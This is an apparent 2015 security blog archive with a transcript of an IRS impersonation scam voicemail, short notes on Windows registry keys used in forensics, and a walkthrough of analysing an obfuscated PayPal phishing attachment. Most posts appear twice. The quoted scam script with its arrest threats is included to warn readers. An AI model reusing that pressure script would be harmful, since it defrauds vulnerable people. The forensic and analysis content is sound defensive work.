I received a voicemail that was interesting enough I thought I'd share regarding an IRS Scam. I didn't answer since I personally recommend, don't ever answer phone calls from non-local numbers, especially ones you weren't expecting and don't know. Let it go to voicemail, screen it, and then determine if it's worth calling back. It was a threatening message from the IRS saying that I'd been caught for Tax Evasion and I would get arrested if I didn't call back. The IRS has posted consumer alerts about scams like this and have several ways to report them. I have seen these before and can tell it's fake just by the accent and his demands to call now or get arrested. But some can be convincing, especially if you haven't received one before or aren't in tune with these type of scams. Enjoy and stay safe. Listen to the full audio of the voicemail. I posted the full transcript on pastebin.
*****
Source: +1 (202) 470-0933
Caller Id Location: DC, USA
Date: 10/27/2015
*****
FULL TRANSCRIPT
*****
We have received a legal position notice against you concerning a tax evasion. So before we file a case against you in the court house and before you get arrested kindly call us back on our callback number. The number to reach me that is 202-470-0933. I'll repeat its 2024700933. Don't disregard this message. Give it a call. Again this is officer Daniel Cruz from the Internal Revenue Service. Thank you and have a blessed day.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Thursday, October 29, 2015
Tuesday, October 27, 2015
Registry Explorer\ComDlg3 Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg3
It appears each time a user opens a file or saves a file using the standard windows dialog box then it's recorded in this registry
For example I opened this registry
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRULegacy\0
And was able to read the following values
notepad++.exe Windows\temp
Which would seem to me to indicate that the user opened the c:\windows\temp folder with notepad++.exe
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg3
It appears each time a user opens a file or saves a file using the standard windows dialog box then it's recorded in this registry
For example I opened this registry
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRULegacy\0
And was able to read the following values
notepad++.exe Windows\temp
Which would seem to me to indicate that the user opened the c:\windows\temp folder with notepad++.exe
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Registry Terminal Server Client\Servers Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Terminal Server Client\Servers
It appears each time a user used Remote Desktop to connect to another computer a registry entry is created in Terminal Server Client folder. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Terminal Server Client\Servers\SERVERXYZ\UsernameHint
And was able to read the following values
DOMAIN1\USER1
Which would seem to me to indicate that USER1 attempted to connect to SERVERXYZ thru domain DOMAIN1
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Software\Microsoft\Terminal Server Client\Servers
It appears each time a user used Remote Desktop to connect to another computer a registry entry is created in Terminal Server Client folder. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Terminal Server Client\Servers\SERVERXYZ\UsernameHint
And was able to read the following values
DOMAIN1\USER1
Which would seem to me to indicate that USER1 attempted to connect to SERVERXYZ thru domain DOMAIN1
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Registry Explorer\RecentDocuments Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocuments
It appears each time a file or folder is accessed in a Windows operating system, it records it in the RecentDocuments registry (which makes sense based on the name). For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.docx\3
And was able to read the following values
PracticeExam.docx, PracticeExam.docx.lnk
Which would seem to me to indicate that a word document was recently accessed.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocuments
It appears each time a file or folder is accessed in a Windows operating system, it records it in the RecentDocuments registry (which makes sense based on the name). For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.docx\3
And was able to read the following values
PracticeExam.docx, PracticeExam.docx.lnk
Which would seem to me to indicate that a word document was recently accessed.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Registry Shell\BagMRU Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\Shell\BagMRU
It appears each time a folder is accessed in a Windows operating system, it records that folder in the BagMRU registry For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_AppData_Local_Microsoft_Windows_UsrClass.dat\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\14
And was able to read the following values
login_scripts
Which would seem to me to indicate that a folder named login_scripts was accessed.
NirSoft has a nice utility called ShellBagsView that allows you to view these values.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Software\Microsoft\Windows\Shell\BagMRU
It appears each time a folder is accessed in a Windows operating system, it records that folder in the BagMRU registry For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_AppData_Local_Microsoft_Windows_UsrClass.dat\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\14
And was able to read the following values
login_scripts
Which would seem to me to indicate that a folder named login_scripts was accessed.
NirSoft has a nice utility called ShellBagsView that allows you to view these values.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Registry Explorer\UserAssist Key
If you've ever looked through a memory dump and noticed the following registry key getting modified, here's my take on what it's doing.
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count\
It appears each time a program is executed on a Windows operating system, it keeps track of them, including the date/time and # of times ran in this key. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count\RANDOMLETTERS
And was able to read the following values
mstsc.exe , Microsoft.Windows.RemoteDesktop
Which would seem to me to indicate that Remote Desktop was launched.
In another example I saw this text
TaskBar\Google Chrome.lnk
Which would seem to indicate Chrome was launch from the windows menu bar at the bottom of the screen.
Didier Stevens has a nice utility called UserAssist that allows you to view these values.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count\
It appears each time a program is executed on a Windows operating system, it keeps track of them, including the date/time and # of times ran in this key. For example, I opened the following registry key
HKEY_USERS\C__Users_USERNAME_ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count\RANDOMLETTERS
And was able to read the following values
mstsc.exe , Microsoft.Windows.RemoteDesktop
Which would seem to me to indicate that Remote Desktop was launched.
In another example I saw this text
TaskBar\Google Chrome.lnk
Which would seem to indicate Chrome was launch from the windows menu bar at the bottom of the screen.
Didier Stevens has a nice utility called UserAssist that allows you to view these values.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Monday, October 26, 2015
Walking Thru a Phishing Email Attachment
Here's a walk-thru of how I look at a Phishing Email Attachment.
There was a McAfee alert 'HTML/Phishing.b' on a file called 'form.html'. This likely came from a user opening/clicking on an attachment in an email.
Since McAfee marked as Infected and deleted it, the file was no longer in the original folder that the alert had triggered. But it was in the McAfee Quarantine folder as a .bup so I was able to extract it like this.
The file that came back was this ugly javascript, obfuscated and hard to read. Just at a high level, if you look at this document it contains this massively long Base64 encoded variable which is then decoded and de-obfuscated by the ugly javascript into some working HTML code that the user's browser or email client would then display.
I know this because I see at the bottom the javascript command 'document.write' which is used to write raw HTML to a page. Now to be safe, I didn't want to run this javascript directly, so I re-saved this javascript and changed 'document.write' to 'console.log'. What this does is allow me to see the HTML without actually having the browser render it (much safer). Then I hit F12 to see my firefox developer tools, re-load the javascript, and see in the console tab that the HTML is now outputted for me.
After the javascript runs, the HTML displayed is this. It's an HTML form styled nicely to phish Paypal credentials and send them to an .ru (russian) website.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
There was a McAfee alert 'HTML/Phishing.b' on a file called 'form.html'. This likely came from a user opening/clicking on an attachment in an email.
Since McAfee marked as Infected and deleted it, the file was no longer in the original folder that the alert had triggered. But it was in the McAfee Quarantine folder as a .bup so I was able to extract it like this.
The file that came back was this ugly javascript, obfuscated and hard to read. Just at a high level, if you look at this document it contains this massively long Base64 encoded variable which is then decoded and de-obfuscated by the ugly javascript into some working HTML code that the user's browser or email client would then display.
I know this because I see at the bottom the javascript command 'document.write' which is used to write raw HTML to a page. Now to be safe, I didn't want to run this javascript directly, so I re-saved this javascript and changed 'document.write' to 'console.log'. What this does is allow me to see the HTML without actually having the browser render it (much safer). Then I hit F12 to see my firefox developer tools, re-load the javascript, and see in the console tab that the HTML is now outputted for me.
After the javascript runs, the HTML displayed is this. It's an HTML form styled nicely to phish Paypal credentials and send them to an .ru (russian) website.
Subscribe to:
Posts (Atom)